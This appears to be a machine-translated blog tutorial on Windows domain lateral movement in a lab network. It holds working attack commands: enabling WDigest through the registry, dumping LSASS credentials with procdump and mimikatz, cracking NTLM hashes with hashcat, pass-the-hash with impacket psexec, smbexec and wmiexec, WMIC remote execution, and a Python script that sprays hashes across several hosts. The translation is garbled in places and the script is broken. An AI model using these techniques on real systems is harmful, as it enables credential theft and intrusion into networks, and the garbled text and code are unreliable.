Location>code7788 >text

8.18 Domain horizontal smb&wmi plaintext or hash delivery

Popularity:36 ℃/2024-09-05 23:27:16

point of knowledge (math.)

Default for windows 2012 and aboveClose wdigust, the attacker cannot get the plaintext password from memory;

Windows 2012 or below if you installKB287199 Patch, and likewise cannot obtain plaintext passwords from memory;

cure:

1, the use of hash hash pass (ptl, ptk, etc.) to move

2, the use of other service protocols (SMB, WMI, etc.) for hash movement

3, the use of registry operations to open the wdigust, Auth value for obtaining

4、Using tools or third-party platforms (Hachcat) for cracking

Knowledge Point 2:

Windows system LM Hash and NTLM Hash encryption algorithm, personal system after Windows vista, server system after Windows 2003, authentication method are NTLM Hash.

Registry modifications to turn on the Wdigest Auth value

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Procdump (windows official) + Mimikatz with the acquisition of the

vantage: Includes some windows local policy and account management, after obtaining the file, it can be decrypted locally mimikatz;
cmd switch disk:cd /d target address

When mimikatz fails to retrieve the password, use procdump to retrieve it.

1, to generate the password hash value stored in the .dmp file

procdump -accepteula -ma
    

2. Put the dmp file on mimikatz and execute it

Privilege::debug

Logging the results of console input: log

sekurlsa::minidump

sekurlsa::logonPasswords full

With two software to extract passwords

Pwdump7

QuarksPwdump

Hashcat Tool Crack Get Windows NTML Hash


    hashcat -a 0 -m 1000 hash file --force

The tool also supports more password cracking

32ed87bdb5fdc5e9cba88547376818d4

Remote execution via plaintext hash delivery using SMB services, with the condition that service port 445 is open is sufficient;

1、psexec first (file in pstool): ipc link first, psexec needs to be passed plaintext or hash

Need ipc link first, -s to run with System privileges

net use \[IP]\ipc$"[password]" /user:[username]

net use \192.168.79.132\ipc$ lcn#123456 /user:\Administrator #Establish tcp connection

\192.168.79.132 -s cmd
    

2, psexec the second: no need to establish IPC directly provide plaintext account passwords

\[IP] -u [username] -p [password] -s cmd

\192.168.79.132 -u administrator -p lcn#123456 -s cmd

-hashes :[password hash value] . /[username]@[IP].

-hashes :b7f2f7b2491ba316e8cd773f8c2d58df ./[email protected]

-hashes :$HASH$ ./[email protected]

-hashes :[password's hash value] [domain]/[username]@[IP]

-hashes :$HASH$ domain/[email protected]

Failed attempt.

The official Pstools can't use hash connections, you can use the impacket toolkit, which is easy to use and easy to kill

3smbexec no need to ipc link plaintext or hash pass first

smbexec [domain]/[username]:[password]@[IP]

smbexec /administrator:lcn#[email protected]

smbexec . /[username]:[password]@[ip]

smbexec ./administrator:lcn#[email protected]
    
smbexec -hashes :[password hash] . /[username]@[IP].

smbexec -hashes :$HASH$ ./lcn#[email protected]
    
smbexec -hashes :[password hash] [domain]/[username]@[IP]
    

smbexec -hashes :$HASH$ /[email protected]

 smbexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df  /[email protected]

Same thing with psexec templates from the impacket toolkit

psexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df  /[email protected]

How to distinguish between local and domain users

net user : local user
net user /domain: domain user; domain name is required to connect to domain user;

Domain Lateral Mobility WMI services utilizing -cscript, wmiexec, wmic

WMI (Windows Management Instrumentation) is the== Exploitation via port 135, supports authentication by username plaintext or hash, and the method does not leave traces in the target logging system.==**

**1. Self-contained WMIC plaintext delivery, no display back

wmic /node:[IP] /user:[user ID] /password:[cryptographic] process call create "[command]"

wmic /node:192.168.79.130 /user:administrator /password:admin@123 process call create " /c ipconfig >C:\"

(Run cmd, execute ipconfig and output the result to the C drive)

2、Self-contained cscript plaintext delivery, there are back to show, need to download with the

cscript //nologo /shell [IP] [username] [password]

cscript //nologo /shell 192.168.79.130 administrator admin@123

Will bounce a shell

3, kit impacket wmiexec plaintext or hash delivery, there is a return exe version, may be killed

wmiexec . /[username]:[password]@[IP] "[command]"

wmiexec ./administrator:lcn#[email protected] "whoami"

wmiexec [domain]/[username]:[password]@[IP] "[command]"

wmiexec /administrator:lcn#[email protected] "whoami"

wmiexec -hashes :[password hash] . /[username]:[password]@[IP] "[command]"

wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./[email protected] "whoami"

wmiexec -hashes :[password hash value] [domain]/[username]:[password]@[IP] "[command]"

wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 god/[email protected] "whoami"

Domain lateral move above service hash batch utilization - python compiled exe

Batch attempts at horizontal penetration using exe files made by py scripts

Ideas for horizontal penetration attacks on the intranet

Collect passwords in plaintext or hash via mimikatz, "net user /domain" collects usernames in domain, "for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL=" "Explore live addresses in the domain

Batch scanning, bumping with passwords

Collect more passwords

Repeat steps 2 and 3
``
 ```
 import os
import time
ips={
'192.168.79.128',
'192.168.79.129',
'192.168.79.130',
'192.168.79.132'
}
users={
'admin',
'Administrator',
'administrator',
'userlu',
'testuser',
'juligan'
}
hashs={
'579da618cfbfa85247acf1f800a280a4',
'b7f2f7b2491ba316e8cd773f8c2d58df'
}
'''
passs={
'admin@123', 'admin!123', 'admin#123', 'lcn#123456'}
'''
for ip in ips:
for user in users:
for hash in hashs:
# wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./[email protected] "whoami"
exec="wmiexec -hashes :" +hash +' /' +user+ '@'+ ip + "whoami"
execs = "wmiexec -hashes :" + hash + ' ./administrator' + user + '@' + ip + "whoami"
print('--》'+exec+'《--')
(exec)
(1)


### Resources involved:

Hashcat:/hashcat/hashcat

Password cracking all-in-one tool: Hashcat password cracking cheats:/sectool/

mimikatz:/gentilkiwi/mimikatz

impacket:/SecureAuthCorp/impacket

impacket-examples-windows:/RichChigga/impacket-examples-windows

PsTools:/zh-cn/sysinternals/downloads/pstools

ProcDump:/zh-cn/sysinternals/downloads/procdump

/realdeveloperongithub/K8tools/blob/master/

(looking for two):/mirrors/K8tools/blob/master/